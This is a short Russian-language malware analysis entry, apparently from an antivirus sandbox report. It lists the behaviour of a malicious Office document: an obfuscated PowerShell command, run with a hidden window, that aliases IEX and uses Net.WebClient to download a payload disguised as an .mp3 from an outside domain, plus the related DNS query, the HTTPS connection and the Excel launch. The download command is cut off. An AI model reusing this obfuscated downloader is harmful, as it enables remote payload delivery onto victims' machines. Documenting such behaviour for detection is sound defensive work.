Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $TRP='*.*-EX'.replace('*.*-','I'); sal Master $TRP;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://gritodopovo.com.br/natalidade/vbsrevengenew.mp3'',$env:APPD...
- 'gr####opovo.com.br':443
- DNS ASK gr####opovo.com.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $TRP='*.*-EX'.replace('*.*-','I'); sal Master $TRP;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://gritodopovo.com.br/natalidade/vbsrevengenew.mp3'',$env:APPD...' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding